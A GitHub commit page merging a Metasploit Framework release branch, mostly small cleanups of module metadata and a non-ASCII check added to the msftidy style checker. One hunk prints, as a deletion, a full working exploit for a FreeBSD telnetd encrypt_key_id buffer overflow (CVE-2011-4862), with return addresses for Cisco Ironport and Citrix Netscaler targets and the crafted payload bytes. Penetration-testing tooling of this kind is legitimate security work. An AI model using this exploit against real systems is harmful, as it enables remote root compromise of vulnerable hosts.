Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP
Browse files

Merge branch 'release/20120110000001' into stable

  • Loading branch information...
commit 7f9cd45dcac427dd0a77d6875851e33d9ae0c58b 2 parents 9a37792 + 5700bf9
@jcran jcran authored
View
2  modules/auxiliary/analyze/jtr_aix.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
- 'Name' => 'John the Ripper Linux Password Cracker',
+ 'Name' => 'John the Ripper AIX Password Cracker',
'Version' => '$Revision$',
'Description' => %Q{
This module uses John the Ripper to identify weak passwords that have been
View
2  modules/auxiliary/scanner/http/drupal_views_user_enum.rb
@@ -23,7 +23,7 @@ module of Drupal, brute-forcing the first 10 usernames from 'a' to 'z'
'Author' =>
[
'Justin Klein Keane', #Original Discovery
- 'Robin François <rof[at]navixia.com>'
+ 'Robin Francois <rof[at]navixia.com>'
],
'License' => MSF_LICENSE,
'References' =>
View
1  modules/auxiliary/scanner/smtp/smtp_version.rb
@@ -37,7 +37,6 @@ def run_host(ip)
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
print_status("#{ip}:#{rport} SMTP #{banner_sanitized}")
report_service(:host => rhost, :port => rport, :name => "smtp", :info => banner)
- print_error("#{rhost}:#{rport} #{e} #{e.backtrace}")
end
end
View
134 modules/exploits/freebsd/telnet/telnet_encrypt_keyid_bruteforce.rb
@@ -1,134 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Exploit::Remote
-
- include Msf::Exploit::Remote::Tcp
- include Msf::Exploit::Brute
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'FreeBSD based telnetd encrypt_key_id brute force',
- 'Description' => %q{
- This module exploits a buffer overflow in the encryption option handler of the
- FreeBSD telnet service.
- },
- 'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
- 'References' =>
- [
- ['BID', '51182'],
- ['OSVDB', '78020'],
- ['CVE', '2011-4862'],
- ['URL', 'http://www.exploit-db.com/exploits/18280/']
- ],
- 'Privileged' => true,
- 'Payload' =>
- {
- 'Space' => 128,
- 'BadChars' => "\x00",
- },
- 'Platform' => [ 'bsd' ],
- 'Targets' =>
- [
- #
- # specific targets
- #
- [ 'Cisco Ironport 7.x Bruteforce',
- {
- 'Bruteforce' =>
- {
-
- 'Start' => { 'Ret' => 0x0805cffd },
- 'Stop' => { 'Ret' => 0x0805aa00 },
- 'Step' => 8
- }
- }
- ],
-
- [ 'Citrix Netscaler 9.x',
- {
- 'Bruteforce' =>
- {
-
- 'Start' => { 'Ret' => 0x0805bffd },
- 'Stop' => { 'Ret' => 0x08059000 },
- 'Step' => 8
- }
- }
- ],
-
- [ 'Other FreeBSD based targets',
- {
- 'Bruteforce' =>
- {
-
- 'Start' => { 'Ret' => 0x0805fffd },
- 'Stop' => { 'Ret' => 0x08050000 },
- 'Step' => 8
- }
- }
- ],
-
-
- ],
- 'DefaultTarget' => 0,
- 'DisclosureDate' => 'Dec 23 2011'))
-
- register_options(
- [
- Opt::RPORT(23),
- ], self.class )
- end
-
- def brute_exploit(addrs)
- curr_ret = addrs['Ret']
- begin
- connect
-
- sock.get_once
- print_status('Initiate encryption mode ...')
-
- req = ''
- req << "\xff\xfa\x26\x00\x01\x01\x12\x13"
- req << "\x14\x15\x16\x17\x18\x19\xff\xf0"
- req << "\x00"
-
- sock.put(req)
- sock.get_once
- req = ''
- print_status("Trying return address 0x%.8x..." % curr_ret )
- print_status('Sending first payload ...')
-
- req << "\xff\xfa\x26\x07"
- req << "\x00"
- req << make_nops(71)
- penc = payload.encoded.gsub("\xff", "\xff\xff")
- req << [curr_ret].pack('V')
- req << [curr_ret].pack('V')
-
- req << make_nops(128)
- req << penc
- req << "\x90\x90\x90\x90"
- req << "\xff\xf0"
- req << "\x00"
-
- sock.put(req)
- sock.get_once
- print_status('Sending second payload ...')
- sock.put(req)
-
- disconnect
- handler
- rescue
- end
- end
-
-end
View
4 modules/exploits/multi/http/op5_license.rb
@@ -17,7 +17,7 @@ def initialize(info = {})
'Name' => 'OP5 license.php Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary root command execution vulnerability in the
- OP5 Monitor license.php. Ekelöw has confirmed that OP5 Monitor versions 5.3.5,
+ OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5,
5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.
},
'Author' => [ 'Peter Osterberg <j[at]vel.nu>' ],
@@ -105,4 +105,4 @@ def exploit
return
end
end
-end
+end
View
2  modules/exploits/unix/webapp/trixbox_langchoice.rb
@@ -113,7 +113,7 @@ def check
# If it has the target footer, we know its vulnerable
# however skining may mean the reverse is not true
# We've only tested on v2.6.1, so that is all we will guarantee
- # Example footer: v2.6.1 ©2008 Fonality
+ # Example footer: v2.6.1 &copy;2008 Fonality
# if response.body =~ /(v2\.(?:[0-5]\.\d|6\.[0-1]))\s{2}&copy;200[0-8] Fonality/
if response.body =~ /(v2\.6\.1)\s{2}&copy;2008 Fonality/
print_status "Trixbox #{$1} detected!"
View
2  modules/exploits/windows/scada/procyon_core_server.rb
@@ -32,7 +32,7 @@ def initialize(info={})
'Version' => '$Revision$',
'Author' =>
[
- 'Knud Højgaard <keh[at]nsense.dk>', # Initial discovery
+ 'Knud Hojgaard <keh[at]nsense.dk>', # Initial discovery
'mr_me <steventhomasseeley[at]gmail.com>', # Initial discovery & poc/msf
],
'References' =>
View
14 tools/msftidy.rb
@@ -3,7 +3,7 @@
# Check (recursively) for style compliance violations and other
# tree inconsistencies.
#
-# by jduck
+# by jduck and friends
#
##
@@ -82,6 +82,7 @@ def check_single_file(dparts, fparts, f_rel)
spaces = 0
bi = []
ll = []
+ bc = []
cr = 0
url_ok = true
nbo = 0 # non-bin open
@@ -113,6 +114,9 @@ def check_single_file(dparts, fparts, f_rel)
src_ended = true if ln =~ /^__END__$/
next if src_ended
+ if ln =~ /[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]/
+ bc << [ idx, ln.inspect]
+ end
if (ln.length > LONG_LINE_LENGTH)
ll << [ idx, ln ]
@@ -156,6 +160,14 @@ def check_single_file(dparts, fparts, f_rel)
}
end
+ if bc.length > 0
+ puts "%s ... probably has unicode: %u" % [f, bc.length]
+ bc.each { |ec|
+ ec[1] = ec[1].inspect
+ puts ' %8d: %s' % ec
+ }
+ end
+
show_count(f, 'carriage return EOL', cr)
show_missing(f, 'incorrect URL to framework site', url_ok)
show_missing(f, 'writes to stdout', no_stdio)
Please sign in to comment.
Something went wrong with that request. Please try again.